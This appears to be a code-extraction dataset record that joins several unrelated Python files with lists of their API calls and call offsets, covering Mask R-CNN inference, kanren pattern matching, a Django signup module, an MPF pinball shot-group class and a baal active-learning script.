                   'surfboard', 'tennisracket', 'bottle', 'wineglass', 'cup',
                   'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
                   'sandwich', 'orange', 'broccoli', 'carrot', 'hotdog', 'pizza',
                   'donut', 'cake', 'chair', 'couch', 'pottedplant', 'bed',
                   'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
                   'keyboard', 'cellphone', 'microwave', 'oven', 'toaster',
                   'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
                   'teddybear', 'hairdrier', 'toothbrush']
    config = InferenceConfig()
    # Create model object in inference mode.
    model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
    # Load weights trained on MS-COCO
    model.load_weights(COCO_MODEL_PATH, by_name=True)
    run(read_direc, save_direc, model, COCO_MODEL_PATH, class_names, args['saveimage'])
    print('Finished')
|
[
"sys.path.append",
"os.mkdir",
"cv2.equalizeHist",
"argparse.ArgumentParser",
"cv2.cvtColor",
"os.path.exists",
"numpy.shape",
"cv2.imread",
"numpy.where",
"mask_rcnn.mrcnn.model.MaskRCNN",
"os.path.join",
"os.listdir",
"cv2.resize"
] |
[((11, 37), 'sys.path.append', 'sys.path.append', (['"""../src/"""'], {}), "('../src/')\n", (26, 37), False, 'import sys\n'), ((591, 620), 'numpy.where', 'np.where', (["(r['class_ids'] != 0)"], {}), "(r['class_ids'] != 0)\n", (599, 620), True, 'import numpy as np\n'), ((831, 853), 'numpy.where', 'np.where', (['(scores > 0.7)'], {}), '(scores > 0.7)\n', (839, 853), True, 'import numpy as np\n'), ((1112, 1157), 'os.path.exists', 'os.path.exists', (['"""./processed_images_mask.txt"""'], {}), "('./processed_images_mask.txt')\n", (1126, 1157), False, 'import os\n'), ((1605, 1627), 'os.listdir', 'os.listdir', (['read_direc'], {}), '(read_direc)\n', (1615, 1627), False, 'import os\n'), ((3511, 3530), 'argparse.ArgumentParser', 'ap.ArgumentParser', ([], {}), '()\n', (3528, 3530), True, 'import argparse as ap\n'), ((4013, 4047), 'os.path.join', 'os.path.join', (['"""mask_rcnn/"""', '"""logs"""'], {}), "('mask_rcnn/', 'logs')\n", (4025, 4047), False, 'import os\n'), ((5501, 5572), 'mask_rcnn.mrcnn.model.MaskRCNN', 'modellib.MaskRCNN', ([], {'mode': '"""inference"""', 'model_dir': 'MODEL_DIR', 'config': 'config'}), "(mode='inference', model_dir=MODEL_DIR, config=config)\n", (5518, 5572), True, 'import mask_rcnn.mrcnn.model as modellib\n'), ((1389, 1421), 'os.path.exists', 'os.path.exists', (["(save_direc + '/')"], {}), "(save_direc + '/')\n", (1403, 1421), False, 'import os\n'), ((1429, 1455), 'os.mkdir', 'os.mkdir', (["(save_direc + '/')"], {}), "(save_direc + '/')\n", (1437, 1455), False, 'import os\n'), ((1779, 1806), 'cv2.imread', 'cv2.imread', (['(read_direc + fi)'], {}), '(read_direc + fi)\n', (1789, 1806), False, 'import cv2\n'), ((1871, 1909), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2HSV'], {}), '(image, cv2.COLOR_BGR2HSV)\n', (1883, 1909), False, 'import cv2\n'), ((1933, 1965), 'cv2.equalizeHist', 'cv2.equalizeHist', (['image[:, :, 2]'], {}), '(image[:, :, 2])\n', (1949, 1965), False, 'import cv2\n'), ((1980, 2018), 'cv2.cvtColor', 'cv2.cvtColor', 
(['image', 'cv2.COLOR_HSV2BGR'], {}), '(image, cv2.COLOR_HSV2BGR)\n', (1992, 2018), False, 'import cv2\n'), ((2214, 2243), 'cv2.resize', 'cv2.resize', (['image', '(540, 960)'], {}), '(image, (540, 960))\n', (2224, 2243), False, 'import cv2\n'), ((1488, 1532), 'os.path.exists', 'os.path.exists', (["(save_direc + '/images_mask/')"], {}), "(save_direc + '/images_mask/')\n", (1502, 1532), False, 'import os\n'), ((1544, 1582), 'os.mkdir', 'os.mkdir', (["(save_direc + '/images_mask/')"], {}), "(save_direc + '/images_mask/')\n", (1552, 1582), False, 'import os\n'), ((2132, 2147), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (2140, 2147), True, 'import numpy as np\n'), ((2174, 2189), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (2182, 2189), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
"""Demonstrate associative/commutative pattern matching with kanren."""
from kanren import run, var, fact
from kanren.assoccomm import eq_assoccomm as eq
from kanren.assoccomm import commutative, associative

# Symbolic tags for the two math operations.
add = 'add'
mul = 'mul'

# Register both operations as commutative and associative so the matcher
# may reorder and regroup operands.
fact(commutative, mul)
fact(commutative, add)
fact(associative, mul)
fact(associative, add)

# Logic variables to solve for.
a, b = var('a'), var('b')

# Pattern to match: (5 + a) * b
Original_pattern = (mul, (add, 5, a), b)

# Candidate expressions.
exp1 = (mul, (add, 5, 3), 4)   # (5 + 3) * 4  -- matches with a=3, b=4
exp2 = (mul, 2, (add, 5, 1))   # 2 * (5 + 1)  -- matches via commutativity
exp3 = (add, 5, (mul, 8, 1))   # (8 * 1 + 5)  -- wrong top-level operation

# Print the (a, b) bindings found for each expression (empty when no match).
for expression in (exp1, exp2, exp3):
    print(run(0, (a, b), eq(Original_pattern, expression)))
|
[
"kanren.assoccomm.eq_assoccomm",
"kanren.var",
"kanren.fact"
] |
[((242, 264), 'kanren.fact', 'fact', (['commutative', 'mul'], {}), '(commutative, mul)\n', (246, 264), False, 'from kanren import run, var, fact\n'), ((265, 287), 'kanren.fact', 'fact', (['commutative', 'add'], {}), '(commutative, add)\n', (269, 287), False, 'from kanren import run, var, fact\n'), ((288, 310), 'kanren.fact', 'fact', (['associative', 'mul'], {}), '(associative, mul)\n', (292, 310), False, 'from kanren import run, var, fact\n'), ((311, 333), 'kanren.fact', 'fact', (['associative', 'add'], {}), '(associative, add)\n', (315, 333), False, 'from kanren import run, var, fact\n'), ((360, 368), 'kanren.var', 'var', (['"""a"""'], {}), "('a')\n", (363, 368), False, 'from kanren import run, var, fact\n'), ((370, 378), 'kanren.var', 'var', (['"""b"""'], {}), "('b')\n", (373, 378), False, 'from kanren import run, var, fact\n'), ((589, 615), 'kanren.assoccomm.eq_assoccomm', 'eq', (['Original_pattern', 'exp1'], {}), '(Original_pattern, exp1)\n', (591, 615), True, 'from kanren.assoccomm import eq_assoccomm as eq\n'), ((638, 664), 'kanren.assoccomm.eq_assoccomm', 'eq', (['Original_pattern', 'exp2'], {}), '(Original_pattern, exp2)\n', (640, 664), True, 'from kanren.assoccomm import eq_assoccomm as eq\n'), ((687, 713), 'kanren.assoccomm.eq_assoccomm', 'eq', (['Original_pattern', 'exp3'], {}), '(Original_pattern, exp3)\n', (689, 713), True, 'from kanren.assoccomm import eq_assoccomm as eq\n')]
|
import random
import string
from datetime import datetime
import json
from signup import db
from signup import emails
from mailgun import api as mailgun_api
from sequence import models as sequence_model
def create_signup( email, questions ):
    """ Add a signup for ``email`` to the current sequence.

    Args:
        email: address of the user signing up (matched case-insensitively).
        questions: dict of signup answers; persisted as a JSON string.

    Returns:
        dict representation of the new signup (see ``_signup2json``).

    Raises:
        Exception: if a signup for this email already exists in the
            current sequence.
    """
    sequence = sequence_model.get_current_sequence_number()
    if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence).exists():
        raise Exception('Signup already exists')
    # Bug fix: ``string.letters`` was removed in Python 3; ``ascii_letters``
    # exists in both Python 2 and 3.  Use a CSPRNG because the invite code
    # acts as a bearer token for the signup.
    rng = random.SystemRandom()
    invite_code = ''.join(
        rng.choice(string.ascii_letters + string.digits) for _ in range(32)
    )
    now = datetime.utcnow()
    signup = db.UserSignup(
        email=email,
        invite_code=invite_code,
        questions=json.dumps(questions),
        sequence=sequence,
        date_added=now,
        date_updated=now
    )
    signup.save()
    return _signup2json(signup)
def update_signup( email, questions ):
    """ Update an existing signup in the current sequence.

    Answers in ``questions`` are merged over the stored ones.  A signup
    that was previously deleted is undeleted by this call.
    """
    sequence = sequence_model.get_current_sequence_number()
    signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence)
    # Merge the new answers over whatever was stored before.
    merged = json.loads(signup_db.questions)
    merged.update(questions)
    signup_db.questions = json.dumps(merged)
    signup_db.date_updated = datetime.utcnow()
    signup_db.date_deleted = None
    signup_db.save()
    return _signup2json(signup_db)
def create_or_update_signup( email, questions ):
    """ Create a signup, or update it when one already exists in the current sequence. """
    sequence = sequence_model.get_current_sequence_number()
    already_signed_up = db.UserSignup.objects.filter(
        email__iexact=email, sequence=sequence
    ).exists()
    if already_signed_up:
        return update_signup(email, questions)
    return create_signup(email, questions)
def delete_signup( email, sequence ):
    """ Soft-delete the signup for ``email`` in ``sequence``.

    Raises:
        Exception: if the signup is already marked as deleted.
    """
    already_deleted = db.UserSignup.objects.filter(
        email__iexact=email, sequence=sequence, date_deleted__isnull=False
    ).exists()
    if already_deleted:
        raise Exception('Signup already deleted')
    signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence)
    # Soft delete: only stamp date_deleted, never remove the row.
    signup_db.date_deleted = datetime.utcnow()
    signup_db.save()
def _signup2json( signup_db ):
signup = {
'email': signup_db.email,
'questions': json.loads(signup_db.questions),
'sequence': signup_db.sequence,
'date_created': signup_db.date_added,
'date_updated': signup_db.date_updated,
'date_deleted': signup_db.date_deleted,
'key': signup_db.invite_code
}
return signup
def get_signup( email, sequence ):
    """ Fetch the active (non-deleted) signup for ``email`` in ``sequence``.

    Raises:
        Exception: if no matching non-deleted signup exists.
    """
    active = db.UserSignup.objects.filter(
        email__iexact=email, sequence=sequence, date_deleted__isnull=True
    )
    if not active.exists():
        raise Exception(u'Signup for {0} not found'.format(email))
    signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence, date_deleted__isnull=True)
    return _signup2json(signup_db)
def get_all_user_signups( email ):
    """ Return every non-deleted signup for ``email``, across all sequences. """
    matching = db.UserSignup.objects.filter(email__iexact=email, date_deleted__isnull=True)
    return list(map(_signup2json, matching))
def get_signup_by_invite_code( invite_code ):
    """ Fetch the active signup that matches ``invite_code``.

    Raises:
        Exception: if no non-deleted signup has this invite code.
    """
    user_set = db.UserSignup.objects.filter(
        invite_code=invite_code,
        date_deleted__isnull=True
    )
    if not user_set.exists():
        # Previously raised a bare Exception() with no message, which made
        # failures impossible to diagnose from logs or API responses.
        raise Exception('Signup for invite code not found')
    return _signup2json(user_set[0])
def get_signups( sequence ):
    """ Return all non-deleted signups, optionally restricted to ``sequence``. """
    queryset = db.UserSignup.objects.filter(date_deleted__isnull=True)
    if sequence:
        queryset = queryset.filter(sequence=sequence)
    return list(map(_signup2json, queryset))
def get_signups_for_archiving( sequence ):
    """ Only use this for archiving.

    Returns the newest signup per email address within ``sequence``
    (Postgres ``DISTINCT ON`` over email, newest ``date_added`` first).
    """
    sequence = int(sequence)
    # TODO this is messy!
    # Pass the value through the params argument instead of concatenating it
    # into the SQL string; int() already guards against injection, but
    # placeholders are the safe, idiomatic form for .raw().
    signups = db.UserSignup.objects.raw(
        'select distinct on (email) * from signup_usersignup '
        'where sequence = %s order by email, date_added DESC;',
        [sequence]
    )
    return [_signup2json(signup) for signup in signups]
def get_new_signups( ):
    """ Return signups whose welcome-email tasks have not been handled yet. """
    pending = db.UserSignup.objects.filter(
        date_tasks_handled__isnull=True, date_deleted__isnull=True
    )
    return [_signup2json(signup) for signup in pending]
def handle_new_signups( ):
    """ Send welcome email to new users.
    Add them to a general mailing list.
    Update db when done. """
    # Process unhandled signups in batches of 500 to bound memory use.
    signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)[:500]
    while len(signups):
        #TODO emails.send_welcome_emails([signup.email for signup in signups])
        for signup in signups:
            add_user_to_global_list(signup.email, signup.sequence)
            #make sure new signups aren't in the mailgun blocked list
            mailgun_api.delete_all_unsubscribes(signup.email)
        # Stamp the whole batch as handled in one UPDATE so it is excluded
        # from the next query; this is what makes the while loop terminate.
        db.UserSignup.objects.filter(id__in=signups.values('id')).update(date_tasks_handled=datetime.utcnow())
        # Fetch the next batch of still-unhandled signups.
        signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)[:500]
def add_user_to_global_list( email, sequence ):
    """ Subscribe the user to the mailing list that receives all emails.

    Looks up the active signup and, when it belongs to a sequence, adds the
    address to that sequence's mailgun list.
    """
    signup_db = db.UserSignup.objects.get(
        email__iexact=email, date_deleted__isnull=True, sequence=sequence
    )
    if not signup_db.sequence:
        return
    mailgun_api.add_list_member(
        sequence_model.sequence_list_name(signup_db.sequence), email
    )
|
[
"signup.db.UserSignup.objects.get",
"json.loads",
"mailgun.api.delete_all_unsubscribes",
"random.choice",
"json.dumps",
"datetime.datetime.utcnow",
"sequence.models.sequence_list_name",
"signup.db.UserSignup.objects.filter",
"sequence.models.get_current_sequence_number",
"mailgun.api.add_list_member"
] |
[((308, 352), 'sequence.models.get_current_sequence_number', 'sequence_model.get_current_sequence_number', ([], {}), '()\n', (350, 352), True, 'from sequence import models as sequence_model\n'), ((602, 619), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (617, 619), False, 'from datetime import datetime\n'), ((1057, 1101), 'sequence.models.get_current_sequence_number', 'sequence_model.get_current_sequence_number', ([], {}), '()\n', (1099, 1101), True, 'from sequence import models as sequence_model\n'), ((1118, 1183), 'signup.db.UserSignup.objects.get', 'db.UserSignup.objects.get', ([], {'email__iexact': 'email', 'sequence': 'sequence'}), '(email__iexact=email, sequence=sequence)\n', (1143, 1183), False, 'from signup import db\n'), ((1205, 1236), 'json.loads', 'json.loads', (['signup_db.questions'], {}), '(signup_db.questions)\n', (1215, 1236), False, 'import json\n'), ((1340, 1365), 'json.dumps', 'json.dumps', (['old_questions'], {}), '(old_questions)\n', (1350, 1365), False, 'import json\n'), ((1395, 1412), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1410, 1412), False, 'from datetime import datetime\n'), ((1630, 1674), 'sequence.models.get_current_sequence_number', 'sequence_model.get_current_sequence_number', ([], {}), '()\n', (1672, 1674), True, 'from sequence import models as sequence_model\n'), ((2085, 2150), 'signup.db.UserSignup.objects.get', 'db.UserSignup.objects.get', ([], {'email__iexact': 'email', 'sequence': 'sequence'}), '(email__iexact=email, sequence=sequence)\n', (2110, 2150), False, 'from signup import db\n'), ((2180, 2197), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2195, 2197), False, 'from datetime import datetime\n'), ((2840, 2936), 'signup.db.UserSignup.objects.get', 'db.UserSignup.objects.get', ([], {'email__iexact': 'email', 'sequence': 'sequence', 'date_deleted__isnull': '(True)'}), '(email__iexact=email, sequence=sequence,\n date_deleted__isnull=True)\n', (2865, 2936), False, 
'from signup import db\n'), ((3024, 3100), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'date_deleted__isnull': '(True)'}), '(email__iexact=email, date_deleted__isnull=True)\n', (3052, 3100), False, 'from signup import db\n'), ((3214, 3299), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'invite_code': 'invite_code', 'date_deleted__isnull': '(True)'}), '(invite_code=invite_code, date_deleted__isnull=True\n )\n', (3242, 3299), False, 'from signup import db\n'), ((3456, 3511), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'date_deleted__isnull': '(True)'}), '(date_deleted__isnull=True)\n', (3484, 3511), False, 'from signup import db\n'), ((4106, 4198), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'date_tasks_handled__isnull': '(True)', 'date_deleted__isnull': '(True)'}), '(date_tasks_handled__isnull=True,\n date_deleted__isnull=True)\n', (4134, 4198), False, 'from signup import db\n'), ((5188, 5284), 'signup.db.UserSignup.objects.get', 'db.UserSignup.objects.get', ([], {'email__iexact': 'email', 'date_deleted__isnull': '(True)', 'sequence': 'sequence'}), '(email__iexact=email, date_deleted__isnull=True,\n sequence=sequence)\n', (5213, 5284), False, 'from signup import db\n'), ((2326, 2357), 'json.loads', 'json.loads', (['signup_db.questions'], {}), '(signup_db.questions)\n', (2336, 2357), False, 'import json\n'), ((4413, 4505), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'date_tasks_handled__isnull': '(True)', 'date_deleted__isnull': '(True)'}), '(date_tasks_handled__isnull=True,\n date_deleted__isnull=True)\n', (4441, 4505), False, 'from signup import db\n'), ((5342, 5395), 'sequence.models.sequence_list_name', 'sequence_model.sequence_list_name', (['signup_db.sequence'], {}), '(signup_db.sequence)\n', (5375, 5395), True, 'from sequence import models as sequence_model\n'), ((5404, 
5449), 'mailgun.api.add_list_member', 'mailgun_api.add_list_member', (['list_name', 'email'], {}), '(list_name, email)\n', (5431, 5449), True, 'from mailgun import api as mailgun_api\n'), ((360, 428), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'sequence': 'sequence'}), '(email__iexact=email, sequence=sequence)\n', (388, 428), False, 'from signup import db\n'), ((522, 567), 'random.choice', 'random.choice', (['(string.letters + string.digits)'], {}), '(string.letters + string.digits)\n', (535, 567), False, 'import random\n'), ((720, 741), 'json.dumps', 'json.dumps', (['questions'], {}), '(questions)\n', (730, 741), False, 'import json\n'), ((1682, 1750), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'sequence': 'sequence'}), '(email__iexact=email, sequence=sequence)\n', (1710, 1750), False, 'from signup import db\n'), ((1912, 2012), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'sequence': 'sequence', 'date_deleted__isnull': '(False)'}), '(email__iexact=email, sequence=sequence,\n date_deleted__isnull=False)\n', (1940, 2012), False, 'from signup import db\n'), ((4791, 4840), 'mailgun.api.delete_all_unsubscribes', 'mailgun_api.delete_all_unsubscribes', (['signup.email'], {}), '(signup.email)\n', (4826, 4840), True, 'from mailgun import api as mailgun_api\n'), ((4971, 5063), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'date_tasks_handled__isnull': '(True)', 'date_deleted__isnull': '(True)'}), '(date_tasks_handled__isnull=True,\n date_deleted__isnull=True)\n', (4999, 5063), False, 'from signup import db\n'), ((2650, 2749), 'signup.db.UserSignup.objects.filter', 'db.UserSignup.objects.filter', ([], {'email__iexact': 'email', 'sequence': 'sequence', 'date_deleted__isnull': '(True)'}), '(email__iexact=email, sequence=sequence,\n date_deleted__isnull=True)\n', (2678, 
2749), False, 'from signup import db\n'), ((4934, 4951), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (4949, 4951), False, 'from datetime import datetime\n')]
|
"""Contains the ShotGroup base class."""
from collections import deque
from mpf.core.device_monitor import DeviceMonitor
from mpf.core.events import event_handler
from mpf.core.mode import Mode
from mpf.core.mode_device import ModeDevice
from mpf.core.player import Player
@DeviceMonitor("common_state", "rotation_enabled")
class ShotGroup(ModeDevice):
    """Represents a group of shots in a pinball machine by grouping together multiple `Shot` class devices.
    This is used so you get
    "group-level" functionality, like shot rotation, shot group completion,
    etc. This would be used for a group of rollover lanes, a bank of standups,
    etc.
    """
    config_section = 'shot_groups'
    collection = 'shot_groups'
    class_label = 'shot_group'
    __slots__ = ["rotation_enabled", "profile", "rotation_pattern"]
    def __init__(self, machine, name):
        """Initialise shot group."""
        super().__init__(machine, name)
        # Whether rotation events actually rotate the member shots; set per
        # mode in device_loaded_in_mode.
        self.rotation_enabled = None
        # Shot profile taken from the first member shot when loaded in a mode.
        self.profile = None
        # deque of rotation directions cycled through when rotate() is
        # called without an explicit direction.
        self.rotation_pattern = None
    def add_control_events_in_mode(self, mode) -> None:
        """Remove enable here."""
        # Intentionally empty: overrides the base-class behaviour so no
        # implicit enable control events are registered for shot groups.
    def device_loaded_in_mode(self, mode: Mode, player: Player):
        """Add device in mode.

        Caches the shared profile and rotation pattern, initialises the
        rotation flag, and subscribes to every member shot's hit event.
        """
        super().device_loaded_in_mode(mode, player)
        self._check_for_complete()
        self.profile = self.config['shots'][0].profile
        self.rotation_pattern = deque(self.profile.config['rotation_pattern'])
        self.rotation_enabled = not self.config['enable_rotation_events']
        for shot in self.config['shots']:
            self.machine.events.add_handler("{}_hit".format(shot.name), self._hit)
    def device_removed_from_mode(self, mode):
        """Disable device when mode stops."""
        super().device_removed_from_mode(mode)
        # Drop the per-shot hit handlers registered in device_loaded_in_mode.
        self.machine.events.remove_handler(self._hit)
    @property
    def common_state(self):
        """Return common state if all shots in this group are in the same state.
        Will return None otherwise.
        """
        state = self.config['shots'][0].state_name
        for shot in self.config['shots']:
            if state != shot.state_name:
                # shots do not have a common state
                return None
        return state
    def _check_for_complete(self):
        """Check if all shots in this group are in the same state.

        Posts the group's completion events when a common state is found.
        """
        state = self.common_state
        if not state:
            # shots do not have a common state
            return
        # if we reached this point we got a common state
        self.debug_log(
            "Shot group is complete with state: %s", state)
        self.machine.events.post('{}_complete'.format(self.name), state=state)
        '''event: (name)_complete
        desc: All the member shots in the shot group called (name)
        are in the same state.
        args:
        state: name of the common state of all shots.
        '''
        self.machine.events.post('{}_{}_complete'.format(self.name, state))
        '''event: (name)_(state)_complete
        desc: All the member shots in the shot group called (name)
        are in the same state named (state).
        '''
    @event_handler(2)
    def event_enable(self, **kwargs):
        """Handle enable control event."""
        del kwargs
        self.enable()
    def enable(self):
        """Enable all member shots."""
        for shot in self.config['shots']:
            shot.enable()
    @event_handler(3)
    def event_disable(self, **kwargs):
        """Handle disable control event."""
        del kwargs
        self.disable()
    def disable(self):
        """Disable all member shots."""
        for shot in self.config['shots']:
            shot.disable()
    @event_handler(1)
    def event_reset(self, **kwargs):
        """Handle reset control event."""
        del kwargs
        self.reset()
    def reset(self):
        """Reset all member shots."""
        for shot in self.config['shots']:
            shot.reset()
    @event_handler(4)
    def event_restart(self, **kwargs):
        """Handle restart control event."""
        del kwargs
        self.restart()
    def restart(self):
        """Restart all member shots."""
        for shot in self.config['shots']:
            shot.restart()
    def _hit(self, advancing, **kwargs):
        """One of the member shots in this shot group was hit.

        Checks for group completion (only when the shot's state advanced)
        and posts the group-level hit events.

        Args:
            advancing: boolean of whether the member shot's state advanced.
            kwargs: forwarded from the shot's hit event; must contain
                'state', the current state name of the member shot.
        """
        if advancing:
            self._check_for_complete()
        self.machine.events.post(self.name + '_hit')
        '''event: (name)_hit
        desc: A member shots in the shot group called (name)
        has been hit.
        '''
        self.machine.events.post("{}_{}_hit".format(self.name, kwargs['state']))
        '''event: (name)_(state)_hit
        desc: A member shot with state (state) in the shot group (name)
        has been hit.
        '''
    @event_handler(9)
    def event_enable_rotation(self, **kwargs):
        """Handle enable_rotation control event."""
        del kwargs
        self.enable_rotation()
    def enable_rotation(self):
        """Enable shot rotation.
        If disabled, rotation events do not actually rotate the shots.
        """
        self.debug_log('Enabling rotation')
        self.rotation_enabled = True
    @event_handler(2)
    def event_disable_rotation(self, **kwargs):
        """Handle disable rotation control event."""
        del kwargs
        self.disable_rotation()
    def disable_rotation(self):
        """Disable shot rotation.
        If disabled, rotation events do not actually rotate the shots.
        """
        self.debug_log('Disabling rotation')
        self.rotation_enabled = False
    @event_handler(4)
    def event_rotate(self, direction=None, **kwargs):
        """Handle rotate control event."""
        del kwargs
        self.rotate(direction)
    def rotate(self, direction=None):
        """Rotate (or "shift") the state of all the shots in this group.
        This is used for things like lane change, where hitting the flipper
        button shifts all the states of the shots in the group to the left or
        right.
        This method actually transfers the current state of each shot profile
        to the left or the right, and the shot on the end rolls over to the
        target on the other end.
        Args:
            direction: String that specifies whether the rotation direction is
                to the left or right. Values are 'right' or 'left'. Default of
                None will cause the shot group to rotate in the direction as
                specified by the rotation_pattern.
        Note that this shot group must, and rotation_events for this
        shot group, must both be enabled for the rotation events to work.
        """
        if not self.rotation_enabled:
            self.debug_log("Received rotation request. "
                           "Rotation Enabled: %s. Will NOT rotate",
                           self.rotation_enabled)
            return
        # shot_state_list is deque of tuples (state num, show step num)
        shot_state_list = deque()
        shots_to_rotate = []
        # Only shots that currently allow rotation take part in the shift.
        for shot in self.config['shots']:
            if shot.can_rotate:
                shots_to_rotate.append(shot)
                shot_state_list.append(shot.state)
        # figure out which direction we're going to rotate
        if not direction:
            direction = self.rotation_pattern[0]
            self.rotation_pattern.rotate(-1)
            self.debug_log("Since no direction was specified, pulling from"
                           " rotation pattern: '%s'", direction)
        # rotate that list
        if direction.lower() in ('right', 'r'):
            shot_state_list.rotate(1)
        else:
            shot_state_list.rotate(-1)
        # step through all our shots and update their states
        for i, shot in enumerate(shots_to_rotate):
            shot.jump(state=shot_state_list[i], force=True)
    @event_handler(8)
    def event_rotate_right(self, **kwargs):
        """Handle rotate right control event."""
        del kwargs
        self.rotate_right()
    def rotate_right(self):
        """Rotate the state of the shots to the right.
        This method is the same as calling rotate('right')
        """
        self.rotate(direction='right')
    @event_handler(7)
    def event_rotate_left(self, **kwargs):
        """Handle rotate left control event."""
        del kwargs
        self.rotate_left()
    def rotate_left(self):
        """Rotate the state of the shots to the left.
        This method is the same as calling rotate('left')
        """
        self.rotate(direction='left')
|
[
"mpf.core.device_monitor.DeviceMonitor",
"collections.deque",
"mpf.core.events.event_handler"
] |
[((279, 328), 'mpf.core.device_monitor.DeviceMonitor', 'DeviceMonitor', (['"""common_state"""', '"""rotation_enabled"""'], {}), "('common_state', 'rotation_enabled')\n", (292, 328), False, 'from mpf.core.device_monitor import DeviceMonitor\n'), ((3187, 3203), 'mpf.core.events.event_handler', 'event_handler', (['(2)'], {}), '(2)\n', (3200, 3203), False, 'from mpf.core.events import event_handler\n'), ((3462, 3478), 'mpf.core.events.event_handler', 'event_handler', (['(3)'], {}), '(3)\n', (3475, 3478), False, 'from mpf.core.events import event_handler\n'), ((3743, 3759), 'mpf.core.events.event_handler', 'event_handler', (['(1)'], {}), '(1)\n', (3756, 3759), False, 'from mpf.core.events import event_handler\n'), ((4012, 4028), 'mpf.core.events.event_handler', 'event_handler', (['(4)'], {}), '(4)\n', (4025, 4028), False, 'from mpf.core.events import event_handler\n'), ((5142, 5158), 'mpf.core.events.event_handler', 'event_handler', (['(9)'], {}), '(9)\n', (5155, 5158), False, 'from mpf.core.events import event_handler\n'), ((5544, 5560), 'mpf.core.events.event_handler', 'event_handler', (['(2)'], {}), '(2)\n', (5557, 5560), False, 'from mpf.core.events import event_handler\n'), ((5953, 5969), 'mpf.core.events.event_handler', 'event_handler', (['(4)'], {}), '(4)\n', (5966, 5969), False, 'from mpf.core.events import event_handler\n'), ((8250, 8266), 'mpf.core.events.event_handler', 'event_handler', (['(8)'], {}), '(8)\n', (8263, 8266), False, 'from mpf.core.events import event_handler\n'), ((8608, 8624), 'mpf.core.events.event_handler', 'event_handler', (['(7)'], {}), '(7)\n', (8621, 8624), False, 'from mpf.core.events import event_handler\n'), ((1424, 1470), 'collections.deque', 'deque', (["self.profile.config['rotation_pattern']"], {}), "(self.profile.config['rotation_pattern'])\n", (1429, 1470), False, 'from collections import deque\n'), ((7375, 7382), 'collections.deque', 'deque', ([], {}), '()\n', (7380, 7382), False, 'from collections import deque\n')]
|
import argparse
from copy import deepcopy
from pprint import pprint
import torch.backends
from PIL import Image
from torch import optim
from torchvision.transforms import transforms
from tqdm import tqdm
from baal import get_heuristic, ActiveLearningLoop
from baal.bayesian.dropout import MCDropoutModule
from baal import ModelWrapper
from baal import ClassificationReport
from baal import PILToLongTensor
from utils import pascal_voc_ids, active_pascal, add_dropout, FocalLoss
try:
import segmentation_models_pytorch as smp
except ImportError:
raise Exception('This example requires `smp`.\n pip install segmentation_models_pytorch')
import torch
import torch.nn.functional as F
import numpy as np
def mean_regions(n, grid_size=16):
    """Reduce a per-pixel uncertainty map to one scalar per image.

    The [batch, W, H] map is average-pooled onto a grid_size x grid_size
    grid and the resulting cells are averaged, yielding a [batch] array.
    """
    # Insert a channel axis: adaptive_avg_pool2d expects [batch, C, W, H].
    uncertainty = torch.from_numpy(n[:, None, ...])
    pooled = F.adaptive_avg_pool2d(uncertainty, grid_size)
    # Flatten the grid cells and average them per image.
    flat = pooled.view([-1, grid_size ** 2]).numpy()
    return np.mean(flat, -1)
def parse_args():
    """Parse the command-line hyperparameters for the active-learning run."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--al_step", default=200, type=int)
    parser.add_argument("--batch_size", default=8, type=int)
    parser.add_argument("--initial_pool", default=40, type=int)
    parser.add_argument("--n_data_to_label", default=20, type=int)
    # Bug fix: without type=float a user-supplied --lr arrived as a string
    # and broke optim.SGD; the default value is unchanged.
    parser.add_argument("--lr", default=0.001, type=float)
    parser.add_argument("--heuristic", default="random", type=str)
    parser.add_argument("--reduce", default="sum", type=str)
    parser.add_argument("--data_path", default="/data", type=str)
    parser.add_argument("--iterations", default=20, type=int)
    parser.add_argument("--learning_epoch", default=50, type=int)
    return parser.parse_args()
def get_datasets(initial_pool, path):
    """Build the active-learning and test datasets for Pascal VOC.

    Args:
        initial_pool: number of samples to label before the first AL step.
        path: root directory of the dataset.

    Returns:
        Tuple of (active_set, test_set).
    """
    IM_SIZE = 224
    # TODO add better data augmentation scheme.
    def _image_pipeline():
        # Resize, centre-crop, tensorise and normalise with ImageNet stats.
        return transforms.Compose([
            transforms.Resize(512),
            transforms.CenterCrop(IM_SIZE),
            transforms.ToTensor(),
            transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
        ])

    transform = _image_pipeline()
    test_transform = _image_pipeline()
    # Segmentation targets: nearest-neighbour resize keeps labels discrete.
    target_transform = transforms.Compose([
        transforms.Resize(512, interpolation=Image.NEAREST),
        transforms.CenterCrop(IM_SIZE),
        PILToLongTensor(pascal_voc_ids),
